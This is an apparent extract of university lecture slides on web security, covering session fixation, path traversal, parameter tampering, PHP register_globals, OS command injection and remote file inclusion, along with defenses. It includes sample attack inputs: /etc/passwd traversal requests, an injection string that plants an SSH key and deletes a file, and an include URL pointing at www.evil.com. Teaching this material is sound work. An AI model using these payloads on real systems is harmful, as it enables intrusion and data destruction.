#### CSC 405 Computer Security

### **Web Security**

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(Derived from slides by Giovanni Vigna and Adam Doupe)

#### Homework 1 is out TODAY!

You will receive your account information immediately after class ;)

10 levels use Burp document your steps for your **report**!

### **Session Fixation**



### **Session Fixation**

#### Attacker



## **Session Fixation**

- If the application blindly accepts an existing session ID, then the initial setup phase is not necessary
- Session IDs should always be regenerated after login and never allowed to be "inherited"
- Session fixation can be composed with cross-site scripting to achieve session id initialization (e.g., by setting the cookie value)
- See: M. Kolsek, "Session Fixation Vulnerability in Web-based Applications"

## **Authorization Attacks**

- Path/directory traversal attacks
  - Break out of the document space by using relative paths
    - GET /show.php?file=../../../../../etc/passwd
    - Paths can be encoded, double-encoded, obfuscated, etc:
      - GET show.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
- Forceful browsing
  - The Web application developer assumes that the application will be accessed through links, following the "intended paths"
  - The user, however, is not bound to follow the prescribed links and can "jump" to any publicly available resource
- Automatic directory listing abuse
  - The browser may return a listing of the directory if no index.html file is present and may expose contents that should not be accessible

### Your Security Zen (interrupt)



## **Authorization Attacks**

- Parameter manipulation
  - The resources accessible are determined by the parameters to a query
  - If client-side information is blindly accepted, one can simply modify the parameter of a legitimate request to access additional information
    - GET /cgi-bin/profile?userid=1229&type=medical
    - GET /cgi-bin/profile?userid=1230&type=medical
- Parameter creation
  - If parameters from the URL are imported into the application, can be used to modify the behavior
    - GET

/cgi-bin/profile?userid=1229&type=medical&admin=1

# PHP register\_global

- The register\_global directive makes request information, such as the GET/POST variables and cookie information, available as global variables
- Variables can be provided so that particular, unexpected execution paths are followed

# PHP - register\_globals

```
<html>
```

<head> <title>Feedback Page</title></head>

<body>

```
<h1>Feedback Page</h1>
```

<?php

```
if ($name && $comment) {
       $file = fopen("user feedback", "a");
       fwrite($file, "$name:$comment\n");
       fclose($file);
       echo "Feedback submitted\n";
     }
   ?>
   <form method=POST>
     <input type="text" name="name"><br>
     <input type="text" name="comment"><br>
     <input type="submit" name="submit" value="Submit">
   </form>
 </body>
</html>
```

### Example

<?php

```
if ($_GET["password"] == "secretunguessable1u90jkfld") {
    $admin = true;
}
if ($admin) {
    show_secret_admin_stuff();
}
```

?>

### Example

#### GET /example.php?password=foo&admin=1

### Example

<?php

```
if ($_GET["password"] == "secretunguessable1u90jkfld") {
    $admin = true;
}
if ($admin) {
    show_secret_admin_stuff();
}
```

?>

## Server (Mis)Configuration: Unexpected Interactions

- FTP servers and web servers often run on the same host
- If data can be uploaded using FTP and then requested using the web server it is possible to
  - Execute programs using CGI (upload to cgi-bin)
  - Execute programs as web application
  - ...
- If a web site allows one to upload files (e.g., images) it might be possible to upload content that is then requested as a code component (e.g., a PHP file)

### Mixing Code and Data in Web Applications

- Numerous areas where Code and Data are mixed in Web Applications
- Anywhere that strings are concatenated to produce output to another program/parser, possible problems
  - HTTP
  - HTML
  - SQL
  - Command Line
  - SMTP

— ...

### **OS Command Injection Attacks**

- Main problem: Incorrect (or complete lack of) validation of user input that results in the execution of OS commands on the server
- Use of (unsanitized) external input to compose strings that are passed to a function that can evaluate code or include code from a file (language-specific)
  - system()
  - eval()
  - popen()
  - include()
  - require()

### **OS Command Injection Attacks**

- Example: CGI program executes a grep command over a server file using the user input as parameter
  - Implementation 1:
    - system("grep \$exp phonebook.txt");
      - By providing:

foo; echo '1024 35 1386...' > ~/.ssh/authorized\_keys; rm
one can obtain interactive access and delete the text file

– Implementation 2:

system("grep \"\$exp\" phonebook.txt");

- By providing
   \"foo; echo '1024 35 1386...' > ~/.ssh/authorized\_keys; rm \"
   one can steal the password file and delete the text file
- Implementation 3:

system("grep", "-e", \$exp, "phonebook.txt");

• In this case the execution is similar to an execve() and therefore more secure (no shell parsing involved)

### **Preventing OS Command Injection**

- Command injection is a sanitization problem
  - Never trust outside input when composing a command string
- Many languages provide built-in sanitization routines
  - PHP escapeshellarg(\$str): adds single quotes around a string and quotes/escapes any existing single quotes allowing one to pass a string directly to a shell function and having it be treated as a single safe argument
  - PHP escapeshellcmd(\$str): escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands (#&;`|\*?~<>^()[]{}\$\, \x0A and \xFF. ' and " are escaped only if they are not paired)

#### **File Inclusion Attacks**

- Many web frameworks and languages allow the developer to modularize his/her code by providing a module inclusion mechanism (similar to the #include directive in C)
- If not configured correctly this can be used to inject attack code into the application
  - Upload code that is then included
  - Provide a remote code component (if the language supports remote inclusion)
  - Influence the path used to locate the code component

#### **File Inclusion in PHP**

- The allow\_url\_fopen directive allows URLs to be used when including files with include() and require()
- If user input is used to create the name of the file to be open then a remote attacker can execute arbitrary code

```
//mainapp.php
```

#### //library.php

. . .

```
...
include($includePath . 'math.php');
```

GET /includes/library.php?includePath=http://www.evil.com/

#### **HackPack Meetings**

- 6:00-7:15 PM at 2220 EB3 on Wednesdays
- 4:10-6:15 PM at 2220 EB3 on Fridays
- <u>https://ncsu-hackpack.slack.com/messages/general</u>
- <u>https://getinvolved.ncsu.edu/organization/HackPack/</u>
- Get some practical experience in discovering and exploiting security problems by playing CTFs!